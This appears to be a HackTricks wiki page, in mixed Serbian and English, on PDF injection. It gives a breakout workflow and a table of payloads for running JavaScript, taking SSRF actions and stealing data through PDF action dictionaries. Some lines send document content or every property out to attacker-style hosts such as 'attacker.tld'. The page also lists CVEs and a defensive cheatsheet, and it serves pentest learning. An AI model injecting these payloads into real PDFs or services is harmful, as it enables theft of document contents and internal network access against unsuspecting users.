PDF Injection

Tip

Nauči i vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči i vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči i vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Pregledaj kompletan HackTricks Training katalog za assessment tracks (ARTA/GRTA/AzRTA) i Linux Hacking Expert (LHE).

Podrži HackTricks

Ako se vaš unos reflektuje unutar PDF fajla, možete pokušati da inject PDF data da izvršite JavaScript, izvršite SSRF ili ukradete sadržaj PDF-a. PDF syntax is extremely permissive – if you can break out of the string or dictionary that is embedding your input you can append totally new objects (or new keys in the same object) that Acrobat/Chrome will happily parse. Since 2024 a wave of bug-bounty reports have shown that one unescaped parenthesis or back-slash is enough for full script execution.

TL;DR – Modern Attack Workflow (2024-2026)

  1. Pronađite bilo koju vrednost pod kontrolom korisnika koja se nađe unutar (parenthesis string), /URI ( … ) ili /JS ( … ) polja u generisanom PDF-u.
  2. Inject ) (zatvaranje stringa) followed by one of the primitives below i završite sa još jednom otvorenom zagradom da biste održali validnu sintaksu.
  3. Dostavite malicious PDF žrtvi (ili backend servisu koji automatski renderuje fajl – odlično za blind bugs).
  4. Vaš payload se izvršava u PDF viewer-u:
  • Chrome / Edge → PDFium Sandbox
  • Firefox → PDF.js (see CVE-2024-4367)
  • Acrobat → Full JavaScript API (can exfiltrate arbitrary file contents with this.getPageNthWord)

Primer (annotation link hijack):

(https://victim.internal/) ) /A << /S /JavaScript /JS (app.alert("PDF pwned")) >> /Next (

Prva ) zatvara originalni URI string, zatim dodajemo novi Action dictionary koji će Acrobat izvršiti kada korisnik klikne link.

Korisne primitive za injekciju

CiljPayload SnippetNapomene
JavaScript on open/OpenAction << /S /JavaScript /JS (app.alert(1)) >>Izvršava se odmah kada se dokument otvori (radi u Acrobat, ne radi u Chrome).
JavaScript on link/A << /S /JavaScript /JS (fetch('https://attacker.tld/?c='+this.getPageNumWords(0))) >>Radi u PDFium & Acrobat ako kontrolišete /Link annotation.
Blind data exfiltration<< /Type /Action /S /URI /URI (https://attacker.tld/?leak=)Kombinujte sa this.getPageNthWord unutar JS da biste ukrali sadržaj.
Server-Side SSRFSame as above but target an internal URL – great when the PDF is rendered by back-office services that honour /URI.
Additional Actions (/AA)/AA << /O << /S /JavaScript /JS (app.alert(1)) >> >>Prikačite na Page/Annotation/Form dictionary da se izvrši pri otvaranju/fokusu.
Line Break for new objects\nendobj\n10 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobjAko biblioteka dozvoljava injektovanje znakova novog reda, možete kreirati potpuno nove objekte.

Embedded Actions as Injection Targets

PDF reader-i tretiraju embedded actions kao što su /OpenAction i /AA (Additional Actions) kao prvoklasne funkcionalnosti koje se mogu pokrenuti kada se dokument otvori ili kada se desi određeni događaj. Ako možete injektovati u bilo koji dictionary koji prihvata actions (Catalog, Page, Annotation, or Form field), možete graft-ovati /AA stablo i pokrenuti JavaScript pri otvaranju/fokusu.

Example payload for generator-side object injection (close the original string/dictionary and inject /AA):

) >> /AA << /O << /S /JavaScript /JS (app.alert('AA fired')) >> >> (

Ovaj obrazac odgovara nedavnim jsPDF problemima u kojima ulaz pod kontrolom napadača, prosleđen u addJS (ili u određena AcroForm polja), izlazi iz predviđenog JavaScript stringa i injektuje Additional Action dictionary.

Trik za slepu enumeraciju

Gareth Heyes (PortSwigger) je objavio jednolinijski skript koji nabraja svaki objekat unutar nepoznatog dokumenta – koristan kada ne možete videti generisani PDF:

) /JS (for(i in this){try{this.submitForm('https://x.tld?'+i+'='+this[i])}catch(e){}}) /S /JavaScript /A << >> (

The code iterates over the Acrobat DOM and makes outbound requests for every property/value pair, giving you a JSON-ish dump of the file. See the white-paper “Portable Data exFiltration” for the full technique.

Real-World Bugs (2023-2026)

  • CVE-2026-25755 – jsPDF addJS PDF object injection: attacker-controlled strings can close the JS literal and inject /AA/O/JavaScript actions that fire on open/focus.
  • CVE-2024-4367 – Proizvoljno izvršavanje JavaScript-a u Firefox’s PDF.js pre 4.2.67 je zaobišlo sandbox pomoću konstruisane /JavaScript akcije.
  • Bug bounty 2024-05 – Veliki fintech je dozvolio customer-supplied invoice notes koje su završile u /URI; izveštaj je plaćen $10k nakon demonstriranog SSRF-a ka internom metadata hostu koristeći file:/// URI.
  • CVE-2023-26155node-qpdf command-injection via unsanitised PDF path pokazuje važnost escape-ovanja backslash-ova i zagrada čak i pre PDF sloja.

Defensive Cheatsheet

  1. Nikada ne konkateniraj sirovi korisnički unos inside () strings or names. Escape \, (, ) as required by §7.3 of the PDF spec or use hex strings <...>.
  2. If you build links, prefer /URI (https://…) that you fully URL-encode; block javascript: schemes in client viewers.
  3. Strip or validate /OpenAction, /AA (additional actions), /Launch, /SubmitForm and /ImportData dictionaries when post-processing PDFs.
  4. On the server side, render untrusted PDFs with a headless converter (e.g. qpdf –decrypt –linearize) that removes JavaScript and external actions.
  5. Keep PDF viewers up to date; PDF.js < 4.2.67 and Acrobat Reader before July 2024 patches allow trivial code execution.
  6. If you use client-side generators (e.g., jsPDF), never pass untrusted input into addJS or AcroForm setters that end up inside PDF action dictionaries.

References

Tip

Nauči i vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči i vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči i vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Pregledaj kompletan HackTricks Training katalog za assessment tracks (ARTA/GRTA/AzRTA) i Linux Hacking Expert (LHE).

Podrži HackTricks